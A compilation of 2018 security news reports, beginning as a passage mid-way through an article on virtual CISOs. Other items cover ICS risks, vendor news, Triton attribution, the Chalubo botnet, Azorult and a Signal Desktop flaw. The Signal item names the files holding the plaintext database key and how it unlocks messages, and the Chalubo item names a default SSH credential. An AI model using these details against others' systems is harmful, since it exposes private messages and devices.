The vDPO is a new and emerging role. It is a service offered by numerous agencies, but there are as yet few seasoned vDPOs. This is not the case with vCISOs. Candy Alexander, the ISSA international president, has been an accidental vCISO for the last four years. She had been a CISO with a federal contractor and was moving to a new position which fell through at the last minute.

Learn More at SecurityWeek's CISO Forum

She moved into consulting just as the concept of vCISO began to grow. “Considering many smaller businesses haven’t invested in security at any level,” she told SecurityWeek, “there is a need for a security strategist – someone that understands business and security – but is not necessarily affordable to bring on as an FTE. With the use of a vCISO, a company can pay by hour (retainer based) or by project, and get the expertise of a highly qualified, experienced CISO without the overhead of benefits and total compensation.”

The vCISO, she continued, is “able to work with multiple clients at a time to equal a full-time salary, with the flexibility of work hours and not having to deal with the internal struggles that usually come with the job.”

This last point is echoed by Bill Bonney, another experienced vCISO and co-author of the CISO Desk Reference Guide. “CISOs are burned out and pissed off at the years of torture they received at the hands of their peers and their bosses,” he said. “More and more of them are deciding that they are not going to continue to absorb the stress and risk of moving, commuting, and being the ‘one throat to choke’.”

Bonney’s work falls into three categories. “I work for one firm that uses me purely in a ‘parachute in’ model – I go in, I help out with a single or specific set of projects, and I get out. I also have my own gigs where I help at a strategic level and turn over long-term operations when I have them at the right stage; and still another model where I act as a resource for consultation.” These models allow him to provide vCISO services to multiple clients simultaneously.

Bonney echoes Alexander’s comment that the vCISO is a security strategist, not a tactician. “What makes for a good virtual CISO as opposed to a perm hire is the ability to remain strategic when you are supposed to be strategic. There are so many tactical needs it is easy to fall into the trap of becoming tactical. But, unless the contract calls for operational support, stay strategic. The other critical success factor is breadth and your personal network. What we call the ‘human network’. Consult with your peers. That makes for a better CISO, but it is critical for a vCISO.”

One difference between the role of the virtual officer and the full-time CISO is that there is less need to understand the business side of the organization. “Although important,” comments Stewart Twynham, a security and privacy evangelist, “for a vCISO it is less about understanding the clients’ business and more about the security, compliance and regulatory frameworks in which the client needs to be operating.”

Rapid7’s Scott King tends to agree, but for a slightly different reason. “Most businesses are run in essentially the same manner. Every business leader will think that their business is unique and different; however, that is not the case. There'll be unique aspects of one company over another, but business is business, and cyber plays a very similar role regardless of industry or market segment. The role just scales or expands into larger companies and/or specific industries (like healthcare, energy, etc.)

But it’s a little different for the vDPO. “A vDPO would be a little different here,” says Twynham, “because the regulatory environment will tend to be a stronger influence in their decision making – so this is where you may well be looking for a background within that particular industry sector – especially in areas such as health, finance or education.”

King thinks it is more important to be able to understand – and accommodate – different corporate cultures. “That is the area where almost every security leader who has failed in their role has struggled,” he told SecurityWeek. “Either the company has adopted a culture where security and risk management are important, or they have not yet gotten there. The successful cyber leader must be able work in both cultures.”

And the virtual officer needs to be able to switch between the two seamlessly, from one client to another.

Navigating the choice of a virtual security officer

Virtual security officers are a good solution in some situations; but are not always the best route for all organizations. If a named CISO and/or DPO is required by law, there are several aspects to consider in deciding between full-time recruitment or a virtual solution.


“Virtual CISOs are a great solution for small and medium businesses that need hands-on expertise and guidance, but would struggle to source, hire and support a traditional CISO,” explains Timur Kovalev, CTO at Untangle. “Smaller organizations already trust channel partners like VARs, MSPs and MSSPs to help them build out their IT solutions. Virtual CISOs are a natural extension to that expertise, bringing together solution architecture and technology services with strategic leadership around policies, compliance and reporting.”

But excessive use of a virtual officer would rapidly reverse the financial equation. “I would never recommend to any customer that they leverage a vCISO on a permanent basis. The cost is prohibitively high and if a company has a need (compliance or other) for a named person in that role, they should just hire for it,” comments King.

The key is in recognizing at what point the use of a virtual officer tips over from being cost-effective to cost-excessive.


The majority of applicants for a full-time CISO role have little or no practical experience of the position. This problem is compounded by the employer often having little or no understanding of what is required – the reason that many companies need a CISO is simply because they haven’t got one.

“Most businesses that need a CISO,” explains Twynham, “don’t actually realize they do. For those businesses that do realize – the difficulty for them is then knowing what they are looking for… which is why some CISO job ads list skills, certifications or frameworks which are just not relevant. Finally – businesses also struggle to understand what a CISO is actually for – which can result in an unproductive engagement.”

However, if a company looks at existing, practicing vCISOs, they will almost certainly – by definition – have the experience of working with and learning from multiple security infrastructures. “The big advantage of operating like this,” adds Twynham, “is that you’re getting the greatest value add out of your vCISO in the minimum time – the 80/20 rule.”

It’s an issue related to ‘cost’. If a company needs a CISO and cannot afford to poach experience from another company, then the virtual route may be the solution. The vCISO could even have a side task to train an existing member of the security team into the role for the long-term.

Immediacy of response

Article 37 of the GDPR allows for vDPOs, “provided that a data protection officer is easily accessible from each establishment.” While access to the vDPO is required, access to the vCISO is self-evidently a necessity. “A vCISO,” says Twynham, “has to be prepared to handle a crisis situation at any time, which obviously cannot be pre-scheduled. Inevitably, if he or she is on the other side of the country, that may necessitate operating remotely which is not always ideal for either party.”

If that crisis involves fire-fighting a malware outbreak with one client, it would be impossible for the same vCISO to tackle active intruders with another. While some of the requirements could be handled remotely, many companies would wish for their primary expert to be available on-site under such circumstances.

The solution to this problem may be to insist on a service level agreement (SLA) with the virtual officer. Most do not work entirely on their own, but may belong to a company offering the service or have at least a working relationship with other virtual officers. Immediacy of response should be the virtual officer’s problem to solve, not the contracting company.


While contracting employers might worry about the level of loyalty a virtual officer might have towards the company, this is probably a non-issue. A virtual officer’s future career will depend upon the quality of testimonials from existing and past clients, and is likely to defend that with as much vigor as any permanent employee.

Where loyalty may be an issue, however, is if the virtual officer is a permanent employee of a third-party company such as an MSP or MSSP. Loyalty to that employer could lead to product pressure.

“Of course an MSSP could fill the role of vCISO,” comments Candy Alexander, “but I would be very careful here. I have seen many of these ‘upselling’ either products or services. I would recommend that if anyone is looking to contract a vCISO, then they ensure that the firm is not a reseller of product, and limit the contract to just vCISO services – with any other consulting services coming from another firm. This would avoid any hidden agendas of getting additional revenue.”

Finding independent virtual officers may become more difficult in future years. More and more consultancies and service providers are likely to add ‘virtual security officers for hire’ over the next few years. “This could be a growth area for traditional MSPs or MSSPs,” says Kovalev, “as well as IT consultants, who want to expand their service portfolio with professional services alongside technology services.”

One position or two?

The final consideration is whether one virtual security officer could be employed as both a vCISO and a vDPO. If the positions were permanent, they would need to be kept separate to conform to GDPR. This specifies that the vDPO must be able to act independently – and the potential for conflict of interest between security and compliance is high where career positions are concerned.

This may not be so with a virtual security officer. “It’s possible that a vCISO could also act as a vDPO,” comments Dana Simberkoff, chief risk, privacy and information security officer at AvePoint. In practice it might be easier for a single virtual officer to find the best route between competing demands than two separate officers with separate priorities. Simberkoff’s primary concern is whether a single officer can have the range of knowledge required for both roles.

Plaintext Passwords Often Put Industrial Systems at Risk: Report
24.10.2018 securityweek

ATLANTA — SECURITYWEEK 2018 ICS CYBER SECURITY CONFERENCE — Plaintext passwords crossing the network, outdated operating systems, direct connections to the Internet, and the lack of automated updates for security solutions often put industrial systems at risk of attacks, according to a new report published on Tuesday by industrial cybersecurity firm CyberX.

The "Global ICS & IIoT Risk Report" is based on the analysis of more than 850 production industrial networks around the world between September 2017 and September 2018.

The analysis showed that 69 percent of industrial sites had their networks traversed by plaintext passwords. The problem is often related to the use of legacy protocols, such as SNMP and FTP, which can expose sensitive credentials and make it easier for malicious actors to conduct reconnaissance and hack systems, CyberX warned.

It also found that many industrial companies don’t air-gap systems, and they actually often connect them directly to the Internet. CyberX discovered that 40 percent of industrial sites have at least one connection to the Internet.

In comparison, last year’s report from CyberX revealed that roughly one-third of industrial sites had been connected to the Internet. It’s worth noting that the 2017 report was based on the analysis of 375 OT networks.

Even more worrying is that CyberX claims to have found at least one remotely accessible device in 84 percent of the industrial networks it has analyzed.

“Remote management and access protocols like RDP, VNC, and SSH make it easier for administrators to remotely configure devices — but they also make it easier to attackers with stolen credentials to learn exactly how equipment is configured and eventually manipulate it,” the company said in its 2018 report.

CyberX clarified that this does not necessarily mean these systems are remotely accessibly from the Internet. Instead, it means that malicious actors gaining access to a network could leverage the remote management and access protocols used by admins for legitimate purposes to more easily navigate through the ICS network.

The report also reveals a problem with cybersecurity software, specifically automatic updates. CyberX determined that 57 percent of industrial sites don't have automatic antivirus updates.

Phil Neray, VP of Industrial Cybersecurity at CyberX, told SecurityWeek that the company looks for the network communications typically associated with automatic antivirus signature updates on clients. If these connections are not present, it’s likely that security software is not being updated automatically, but it could also mean that there is no security software whatsoever.

“In some organizations, the updates are performed periodically via sneakernet and USB drives -- such as once per quarter or once per year -- which means that the AV software is providing very weak protections, since signatures are changing on a daily basis,” Neray explained.

He added, “For many years, the ICS automation vendors did not permit installation of any AV on their devices since the AV scanning was believed to cause latency issues that would negatively affect time-critical processes This has now changed and most vendors have certified both AV as well as application whitelisting solutions. So the lack of AV might be a ‘hangover’ effect from the past, or it might be that many organizations haven't bothered to configure an automated update process.”

Another fairly common security issue identified by CyberX during its monitoring was the presence of wireless access points, which it found in 16 percent of industrial sites. The problem with these access points is that if they are misconfigured, they open the door to various types of threats, particularly malware designed to target networking devices, such as the recently discovered VPNFilter.

Finally, the report says obsolete operating systems, such as Windows XP, have been found in over half of the monitored industrial networks.

While many of CyberX’s recent findings are similar to the ones described in the company’s previous report, this is an area where significant improvements have been recorded. In 2017, there were legacy Windows systems in 76 percent of sites and now it has dropped to 53 percent.

The firm’s experts believe this improvement is the result of the WannaCry and NotPetya attacks, which clearly demonstrated to boards and C-level executives that vulnerabilities in their production environments could have significant consequences.

CyberX data

*Updated with clarifications from CyberX regarding remote access

Mozilla Offers VPN Service to Firefox Users
24.10.2018 securityweek

Mozilla and ProtonVPN this week announced a partnership aimed at keeping users safe while navigating the Internet.

Thus, starting October 24, Mozilla will offer the ProtonVPN service to a small group of Firefox users based in the United States. The company will select the users randomly and will offer them the possibility to purchase a monthly subscription to the virtual private network (VPN).

The VPN service is supported on Windows, macOS, Linux, iOS, and Android, and can be easily turned on or off as needed. The subscription is billed securely using payment services Stripe and Recurly and can be cancelled at any time.

Mozilla teams up with ProtonVPN

Mozilla will collect the payments from the users who decide to subscribe and will also keep most of the revenue from these subscriptions. ProtonVPN will get a portion of the proceeds to offset their costs in operating the service.

“In this way, subscribers will be directly supporting Mozilla while benefiting from one of the very best VPN services on the market today,” Mozilla notes.

According to ProtonVPN, Firefox users will receive the same benefits as those who purchase a ProtonVPN Plus subscription. They will also get a 30-day money back guarantee.

“The Mozilla and ProtonVPN partnership is an experiment in finding new ways to keep Internet users safe while simultaneously ensuring that open source and non-profit software development gets the resources that it deserves,” ProtonVPN explains in a blog post.

VPN services are meant to secure Internet connections against monitoring and eavesdropping by encrypting all Internet traffic and routing it through a secure server. Such a service prevents anyone on the network (including the Internet service provider) from seeing what websites the user is visiting and from tracing them.

When using a VPN service, however, the user puts a lot of trust in the provider, because they depend upon the safety of its technology and its commitment to protecting privacy, Mozilla notes. Thus, before selecting ProtonVPN for the partnership, Mozilla decided to vet and approve the service provider.

The Swiss-based VPN service provider reveals that Mozilla actually took its time during the vetting of ProtonVPN. Not only did they check the system’s architecture, infrastructure, and no-logging policies, but also had a look at the cryptography used to encrypt user traffic.

“We’re excited about this partnership because it furthers our shared goal of making the Internet a safer place. If the experiment goes well, then we may expand it and we can potentially offer ProtonVPN to over 300 million Mozilla users, significantly increasing security and privacy around the world,” the service provider says.

Oracle Adds New Security Services to Cloud Platform
24.10.2018 securityweek

Oracle adds new security services to Cloud Infrastructure

Oracle announced on Tuesday that it has added several new security-related services to its Cloud platform, including a web application firewall (WAF), distributed denial-of-service (DDoS) protection, key management, and a cloud access security broker (CASB).

Oracle says the goal of adding new capabilities to Oracle Cloud Infrastructure, which is the company’s enterprise Infrastructure-as-a-Service (IaaS) platform, is to provide end-to-end security for customers through multiple layers of defense.

The new WAF is designed to protect apps on the Cloud Infrastructure against various types of threats, including botnets, DDoS, and application-specific attacks. Threats are automatically blocked and security teams are notified so that they can investigate further.

In order to help ensure the availability of network resources, even when faced with a high-volume DDoS attack, all Oracle data centers will automatically benefit from DDoS detection and mitigation capabilities.

The new CASB is designed to monitor cloud environments to ensure that security practices are being followed. It also uses behavioral analytics based on machine learning to predict potential threats. Users are provided preconfigured controls and policies to help them deploy applications faster without security or operational risks, Oracle said.

Finally, the key management service provides centralized key management and monitoring capabilities, and allows organizations to encrypt data with keys they control.

“The solution delivers partitions in highly available and certified Hardware Security Modules that are isolated per customer. It is ideal for organizations that need to verify for regulatory compliance and security governance purposes that their data is encrypted where it is stored,” Oracle explained.

The software giant told SecurityWeek that the key management, DDoS and CASB capabilities are already available, while the WAF should become available in November.

The DDoS protection is provided to customers at no additional charge. Information on pricing for the key management and CASB services can be found on Oracle’s website. The company noted that the universal credits for Oracle Cloud Infrastructure can be used for these new services as well.

“Organizations are facing constant security threats from sophisticated actors who want to attack their applications and access their sensitive data,” said Don Johnson, senior vice president of product development at Oracle Cloud Infrastructure. “The new solutions build on Oracle’s existing, strong security heritage and give customers always-on capabilities that make it easier than ever to achieve end-to-end security. These new security layers include highly automated detective, preventive, responsive, and predictive security controls that help mitigate data breaches, address regulatory compliance, and reduce overall risk.”

Super Micro to Customers: Chinese Spy Chips Story Is Wrong
24.10.2018 securityweek

A Bloomberg article claiming that tiny chips were inserted in Super Micro Computer Inc. equipment “is wrong,” the California-based server manufacturer says.

The article, which Bloomberg ran in early October, claimed that Chinese spies, likely state-sponsored, were able to infiltrate production processes and include chips the size of a grain of rice on equipment used by tech giants such as Amazon and Apple.

The chips, the story claimed, would create a stealthy, hardware-based doorway into computer equipment. Attackers could then reportedly leverage these chips to compromise systems in an effort to spy on more than 30 organizations in the United States.

Super Micro has refuted the claims right from the start, saying that it never found any such malicious chips in its equipment, nor has it been informed by a customer on the discovery of such chips.

The U.S. Department of Homeland Security (DHS) and the U.K. National Cyber Security Centre (NCSC) have denied any investigations supposedly launched as a result of the discovery of spy chips.

Amazon said it never found evidence of malicious hardware in Super Micro equipment, while Apple told the U.S. Congress the Bloomberg story was “simply wrong.”

In a letter sent to its customers and also forwarded to the U.S. Securities and Exchange Commission, Super Micro too calls the Bloomberg story wrong. The company also notes that it doesn’t know of or has seen any malicious hardware chips implanted during the manufacturing of their motherboards.

“We trust you appreciate the difficulty of proving that something did not happen, even though the reporters have produced no affected motherboard or any such malicious hardware chip. As we have said firmly, no one has shown us a motherboard containing any unauthorized hardware chip, we are not aware of any such unauthorized chip, and no government agency has alerted us to the existence of any unauthorized chip,” the letter reads.

The company also reveals that, despite the lack of proof, it has decided to undertake “a complicated and time-consuming review to further address the article.” Furthermore, Super Micro notes, it is testing every board, both visually and functionally, throughout the entire manufacturing process.

The letter is meant to reassure customers of the complex testing process it employs for its products, which includes “several automated optical inspections, visual inspections, and other functional inspections.” These tests, the company says, are meant to also check the integrity and composition of designs, so as to discover any discrepancies.

“Our motherboard designs are extremely complex. This complexity makes it practically impossible to insert a functional, unauthorized component onto a motherboard without it being caught by any one, or all, of the checks in our manufacturing and assembly process. The complex design of the underlying layers of the board also makes it highly unlikely that an unauthorized hardware component, or an altered board, would function properly,” the company points out.

“Our motherboard technology involves multiple layers of circuitry. It would be virtually impossible for a third party, during the manufacturing process, to install and power a hardware device that could communicate effectively with our Baseboard Management Controller because such a third party would lack complete knowledge (known as “pin-to-pin knowledge”) of the design,” Super Micro also notes.

Others too have investigated Bloomberg’s claims and note that the manner in which the article says the spy chips would be activated is technically implausible.

In an interview with BuzzFeed News, Apple CEO Tim Cook denied the allegations, and even said that Bloomberg should retract their story. Andy Jassy of Amazon Web Services (AWS) too says Bloomberg should retract.

Andy Jassy of AWS says Bloomberg should retract Chinese spy chips story

Immediately after the original article was published, the stocks of Chinese companies Lenovo Group and ZTE Corporation took a hit. Super Micro’s stock dropped more than 40% and only recovered slightly.

Triton Malware Linked to Russian Government Research Institute
24.10.2018 securityweek
BigBrothers  Virus

The development of the malware tracked as Triton, Trisis and HatMan was supported by a research institute owned by the Russian government, FireEye reported on Tuesday.

The Triton attack, aimed at industrial control systems (ICS) at a critical infrastructure organization in the Middle East, came to light in December 2017. The malware targeted Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, including via the use of a zero-day vulnerability, and it was discovered after a process shutdown that experts believe was accidentally triggered by the hackers.

Several companies have analyzed the attack and the threat actor behind it, including industrial cybersecurity firm Dragos, which tracks the group as Xenotime, and FireEye.

FireEye now says it has uncovered a strong link between the Triton intrusion –- the cybersecurity firm tracks this activity as TEMP.Veles –- and the Central Scientific Research Institute of Chemistry and Mechanics (CNIIHM), a technical research organization located in Moscow and owned by the Russian government.

FireEye has presented several pieces of evidence that show a connection between Triton and the CNIIHM, and the company claims to be in possession of even more information that reinforces the link, but which has been withheld due to its sensitive nature.

FireEye has pointed out that while there is strong evidence suggesting that the Russian institute has been involved in the development of some tools used in the Triton attack, it does not claim that the entire Triton framework is the work of this organization.

There are several aspects that have led to FireEye assessing with “high confidence” that Triton is linked to Russia, the CNIIHM, and an individual located in Moscow. One of the most important clues is related to the testing of some TEMP.Veles tools in a malware testing environment — the security firm has not named the service, but one of the most widely used is VirusTotal.

FireEye’s researchers discovered that a user who has been active in the aforementioned testing environment since 2013 has on several occasions tested various tools, including many customized versions of widely available applications such as Metasploit, Cobalt Strike, PowerSploit, the PowerShell-based WMImplant, and cryptcat.

The goal was apparently to ensure that the custom versions would evade detection by security software. Researchers pointed out that many of the tools were used in TEMP.Veles attacks just days after being analyzed in the malware testing environment.

A path contained in one of the tested files led investigators to the online moniker of a Moscow-based individual who had been involved in vulnerability research and who had apparently been a professor at CNIIHM.

Furthermore, experts also discovered that one IP address registered to the Russian institute had been linked to Triton. This includes monitoring open source coverage of the attack, conducting reconnaissance against TEMP.Veles targets, and various other types of malicious activity in support of the Triton intrusion.

The presence of multiple files with Cyrillic names and artifacts also reinforces the link to Russia, along with behavior patterns consistent with Moscow’s time zone.

Researchers also pointed out that CNIIHM’s knowledge and personnel would make it highly capable of developing the Triton malware. It has research departments that specialize in the protection of critical infrastructure and the development of weapons and military equipment, and it collaborates with a wide range of other organizations, including ones involved in computer science, electrical engineering, defense systems, and information technologies.

It’s also possible, FireEye explained, that some employees of CNIIHM conducted these activities without the knowledge or approval of the organization. However, the company believes this scenario is less likely considering that the activity spans several years and that the institute’s capabilities are consistent with what one would expect of the entity behind the Triton campaign.

Fortinet Tackles Insider Threats with ZoneFox Acquisition
24.10.2018 securityweek

Cybersecurity solutions provider Fortinet today announced that it has completed the acquisition of insider threat detection and response company ZoneFox.

Fortinet provides large enterprises, service providers, and government organizations worldwide with intelligent, seamless protection. Earlier this year, the company, which claims more than 360,000 customers, revealed a new machine learning (ML) threat intelligence and detection offering.

The Edinburgh, Scotland-based, privately-held ZoneFox is focused on combating insider threats through reducing the risk of data theft, leakage and misuse. The company provides actionable insights around user behavior and data flow, from both on and off the corporate network.

With the new acquisition, Fortinet looks to enhance the Fortinet Security Fabric and strengthen its existing endpoint and SIEM business.

Through this deal, the company aims at providing customers with deeper visibility into endpoints and associated data flow and user behavior, and an easy and fast to deploy zero-configuration agent that can scale up to support over 10,000 agents.

Machine learning should help process billions of events per day and discover suspicious activities, while Fortinet’s cloud-based architecture can capture essential data around user, device, resource, process, and behavior.

Furthermore, customers will benefit from full forensics timeline recording of information, while a simple search interface will help analysts quickly determine the actions needed. Out-of-the-box support for industry-wide policies and regulations is also available.

ZoneFox’s machine learning-based threat-hunting technology will complement FortiClient endpoint security, Fortinet says. Thus, the company will provide endpoint detection and response (EDR) and will also add more user entity behavior analytics (UEBA) features to FortiSIEM.

“Fortinet expects that the new endpoint security capabilities provided by ZoneFox will allow enterprise organizations to better leverage machine learning to detect anomalous behavior and provide an even faster response to insider threats,” the company says.

This is the second acquisition Fortinet makes within four months, after acquiring Boston-based network security firm Bradford Networks in July.

Chalubo, a new IoT botnet emerges in the threat landscape
24.10.2018 securityaffairs
IoT  BotNet

Security experts from Sophos Labs have spotted a new piece of IoT malware tracked as Chalubo that is attempting to recruit devices into a botnet used to launch DDoS attacks.
Security experts from Sophos Labs have spotted a new piece of Linux malware tracked as Chalubo (ChaCha-Lua-bot) that is targeting IoT devices in an attempt to recruit them into a botnet used to launch DDoS attacks.

The new IoT malware borrows code from the Xor.DDoS and Mirai bots, it also implements fresh evasion techniques, for example, the authors have encrypted both the main component and its corresponding Lua script using the ChaCha stream cipher.

“Since early September, SophosLabs has been monitoring an increasingly prolific attack targeting Internet-facing SSH servers on Linux-based systems that has been dropping a newly-discovered family of denial-of-service bots we’re calling Chalubo.” reads the analysis from Sophos Labs.

“The attackers encrypt both the main bot component and its corresponding Lua script using the ChaCha stream cipher.”

The malware was first spotted in late August, at the time operators were issuing commands to instruct devices into downloading a malicious code that was composed of three components, a downloader, the main bot, and the Lua command script. The attackers were using brute-force attacks (using the root:admin credential) on SSH servers to distribute the malware.

“These types of simple attacks on our honeypots are quite common, but what made this stand out was the libsdes sample.” continues the analysis.

“This bot demonstrates increased complexity compared to the standard Linux bots we typically see delivered from these types of attacks. Not only are the attackers using a layered approach to dropping malicious components, but the encryption used isn’t one that we typically see with Linux malware.”


The IoT malware ran only on systems with an x86 architecture.

Starting from the mid-October, operators have been issuing commands that retrieve the Elknot dropper that is used to delivers the remaining part of the Chalubo (ChaCha-Lua-bot) package.

The most important novelty is represented by the discovery of a variety of bot versions, designed to target different architectures, including 32-bit and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, and PowerPC.

This circumstance leads into believing that the attackers were testing the bot in August and now are expanding the list of potential targets in the current campaign.

Experts noticed that the downloader would also drop a script, in the same way, the Xor.DDoS bot family does, likely authors borrowed the code from the old threat. Attackers also copied a few code snippets from the infamous Mirai bot, such as some of the randomizing functions and an extended form of the util_local_addr function.

Researchers noticed that the majority of code in bot is new, the authors focused on their own Lua handling for launching DoS attacks with DNS, UDP, and SYN flavours.

The bot’s Lua script first connects the command and control (C&C) server to provide details on the infected machine and to receive further instructions. The script would also download, decrypt, and execute whatever Lua script it finds.

To mitigate the threat, experts recommend that sysadmins of SSH servers, including IoT devices, change any default passwords on those systems.

Further details, including IoCs are reported in the analysis published by Sophos.

For the first time Japanese commission ordered Facebook to improve security
24.10.2018 securityaffairs

The Japanese government ordered Facebook to improve the protection of users’ personal information following the recent data breaches that exposed data from millions of people.
At the end of September, Facebook admitted that attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of 50 Million Users.

A couple of weeks ago, the social network giant announced that hackers accessed data of 29 Million users, a number that is less than initially thought of 50 million.

According to the company, the vulnerability is the result of the chaining of three flaws affecting the “View As” feature and Facebook’s video uploader.

Facebook clarified that the version of the video uploader interface affected by the flaw was introduced in July 2017.

On Monday, Japan’s Personal Information Protection Commission ordered a further investigation of the data breach and asked the company to implement preventive security measures.

This is the first time that the commission has issued warnings to the social network giant after it has conducted an investigation along with British authorities.

According to government spokesman Yoshihide Suga, Facebook told Japanese authorities that the recent data breach also included Japanese users.

The commission also ordered the company to improve communication with users being more transparent of the way it manages their data and promptly responding to request for deleting accounts.

Facebook Data Breach

Another incident involving the company that affected up to 100,000 Japanese users was the Cambridge Analytica privacy scandal that affected 87 Million users.

“It is the first time that the commission, which investigated the data leak with British authorities, has issued warnings to Facebook,” an official told AFP.

Facebook added to be committed to “promptly inform users if the platform was inappropriately used and cooperate with the commission and other countries’ regulators” on its website.

To Secure Medical Devices, the FDA Turns to Ethical Hackers
24.10.2018 securityaffairs

The U.S. Food and Drug Administration (FDA) is embracing the work of ethical hackers and their researches to secure medical devices.
Hacking is an ever-present concern in today’s highly connected society. People typically shudder to think about their smart speakers or home security systems getting compromised, and indeed, vulnerabilities in those devices would be traumatizing.

But, the consequences could arguably be much worse if hackers set their sights on medical devices. Those products are widely used and show a forecasted growth of three percent annually through at least 2022.

Ethical hackers have contacted device manufacturers after exposing vulnerabilities in their products. All the while, the U.S. Food and Drug Administration (FDA) has historically stayed neutral in the debate about what role — if any — those individuals should play exposing weak spots in medical technologies.

But, that’s changing as the agency reports it’s embracing the work of ethical hackers and using the research those parties find to shape their actions.

medical devices.PNG
Image by Rawpixel

A Problem Revealed in Pacemaker Implants
A recent example of a medical device problem concerns a pacemaker manufactured by Medtronic. Billy Rios and Jonathan Butts, two cybersecurity researchers, found a flaw that could let hackers remotely change the settings of the device, potentially leading to dire consequences.

Then, the FDA and Medtronic issued cybersecurity warnings about the pacemakers. Additionally, Medtronic stopped the device’s periodic Internet-based updates on tens of thousands of the pacemakers until the company comes up with an effective fix for the problem.

The FDA Provided Much-Needed Momentum
The FDA was instrumental in making Medtronic respond after hearing about the pacemaker’s security shortages. Butts and Rios disclosed it to Medtronic in January 2017. But, it took more than a year for the company to release security bulletins responding to the identified issues.

The company asserted, though, that it wasn’t possible to remotely manipulate the devices. It also said the vulnerability was “controlled,” and not an immediate patient threat. The two ethical hackers continued engaging back and forth with Medtronic for months, then gave their research to the FDA. The agency followed up by doing its own analysis.

Ultimately, the FDA said its findings matched the previous investigation, and that statement caused Medtronic to admit the bugs could hurt patients if not patched. Such progress emphasizes why the FDA’s collaboration with cybersecurity researchers could be so advantageous for the technology community and consumers alike.

To reiterate, the researchers tried for months to get the manufacturer to take its concerns seriously, to no avail. It was the FDA’s involvement that made the company’s crucial change in attitude happen. If such partnerships continue to occur, patients could benefit from safer products as ethical hackers get more recognition for their worthy research.

A Future-Oriented Mindset
It also appears the situation above won’t be a one-off instance of the FDA’s collaboration with ethical hackers. According to Jeff Shuren, director of the FDA’s Center for Devices and Radiological Health, there is a recognition that cybersecurity researchers have a crucial role to play in revealing medical device issues that could be disastrous if left unchecked.

For example, some of the possible ways to manipulate medical devices include making them behave strangely without a patient or caregiver’s knowledge, or causing the gadgets to give incorrect readings that could change a user’s treatment plan. Hacks could also make diagnostic equipment, such as MRI machines, shut down.

When speaking to The Washington Post, Shuren mentioned the importance of “proactively cultivat[ing] that relationship with the researcher community because they have an integral role to play.” That statement strongly implies the FDA is finally taking the side of the cybersecurity community by affirming how its researchers could be partners in making medical devices as secure as possible.

Shuren also noted that the FDA encourages device manufacturers to rely on ethical hackers internally as well, especially if those companies don’t have people already on board to explore possible shortcomings and fix them before product releases.

The FDA and Department of Homeland Security have signed a memorandum of agreement to work more closely with each other to secure medical devices, too. The hope is that when vulnerabilities are identified, the teamwork between the two agencies would lead to being able to stay on top of medical technologies as they change and assisting medical companies with responding to the security weaknesses.

Government Agencies Present at Cybersecurity Conferences
In August 2018, a representative from Shuren’s department at the FDA attended a presentation Butts and Rios made at a cybersecurity conference to demonstrate another issue — this time with an insulin pump. In response to a Twitter post about that exhibition, FDA Commissioner Scott Gottlieb gave the ethical hackers a nod of approval.

The partnership between government agencies and ethical hackers is still new, and it’s too soon to say if it will be maintained. That outcome looks probable, though, which brings significant and long-lasting benefits.

The new Azorult 3.3 is available in the cybercrime underground market
24.10.2018 securityaffairs

A new version of the Azorult info-stealer appeared in the wild, it is able to steal more data, including other types of cryptocurrencies
A new version of the Azorult info-stealer appeared in the wild, it is able to steal more data, including other types of cryptocurrencies, and implements new features.

The latest version of the Azorult was delivered through the RIG exploit kit as well as other sources, previous variants were mainly distributed via weaponized Office documents as attachment of phishing messages.

AZORult is a data stealer that was first spotted in 2016 by Proofpoint that discovered it was it was part of a secondary infection via the Chthonic banking trojan. Later it was involved in many malspam attacks, but only in July 2018, the authors released a substantially updated variant.

AZORult spyware

In July, the experts discovered a new sophisticated version of the AZORult Spyware that was involved in a large email campaign on July 18.

The malicious code allows crooks to steal credentials, payment card data, browser histories and contents of cryptocurrency wallets.

Now experts from Check Point have discovered a new version that is being advertised in an underground forum.


The new version is a substantial update of the previous one, authors implemented new features such as the ability to steal additional forms of cryptocurrency from the victims’ wallets, including BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore and Exodus Eden.

“During the last week, Check Point Research spotted a new version of Azorult in the wild being delivered through the RIG exploit kit, as well as other sources.” reads the analysis published by the experts.

“There are quite a few changes in this newly witnessed variant, the most prominent ones being a new encryption method of the embedded C&C domain string, a new connection method to the C&C and improvement of the Crypto currency wallets stealer and loader.”

The new variant implements a new encryption method used to protect the hardcoded C&C domain string. along with a new key for connecting to the command and control server.

The new variant was first offered for sale on October 4, a few days the source code for Azorult versions 3.1 and 3.2 were leaked online, earlier this month experts from CheckPoint discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.

Experts speculate the author of Azorult has released a new version of the data-stealer in response to the availability of leakage of the source code.

“Moreover, we have witnessed and written about another project related to Azorult, dubbed ‘Gazorp’ – a dark web binary builder that allows anyone to craft the malware’s binaries for free.” continues CheckPoint.

“Having this in minds, it is plausible that the Azorult’s author would like to introduce new features to the malware and make it worthy as a product in the underground market.” continues CheckPoint.

Further technical details, including IoCs are reported in the analysis published by CheckPoint.

Message Decryption Key for Signal Desktop application stored in plain text
24.10.2018 securityaffairs

The reverse engineer researcher Nathaniel Suchy discovered that Signal Desktop application leaves message decryption key in plain text exposing them to an attacker.
Signal Desktop application leaves message decryption key in plain text potentially exposing them to an attacker. The issue was discovered by the reverse engineer researcher Nathaniel Suchy

The flaw affects the process implemented by the Signal Desktop application to encrypt locally stored messages.

Signal Desktop application leverages an encrypted SQLite database called db.sqlite to store the user’s messages. The encryption key for the encrypted database is generated by the application during the installation phase.

The key is stored in plain text to a local file called %AppData%\Signal\config.json on Windows PCs and on a Mac at ~/Library/Application Support/Signal/config.json.

The encryption key is used each time Signal Desktop application accessed the database.

Signal Desktop key
Source Bleeping Computer

“To illustrate this problem, BleepingComputer installed the Signal Desktop application and sent a few test messages. First we opened our config.json file to retrieve the encryption key, which is shown above.” read a blog post published by Bleeping Computer.

“We then opened the database located at %AppData%\Roaming\Signal\sql\db.sqlite using a program called SQLite Database Browser.”

By entering the key, the experts at Bleeping Computer were able to read the content of the database.

The issue could be easily addressed by requiring users to set a password that would be used to encrypt the key the database encryption key.

“This would be easily mitigated by requiring users to set a password and using that password to encrypt the key” Suchy told Bleeping Computer.

On August 2018, the Italian cybersecurity passionate Leonardo Porpora discovered that it was possible to recover the expired messages from Signal version 1.14.3,

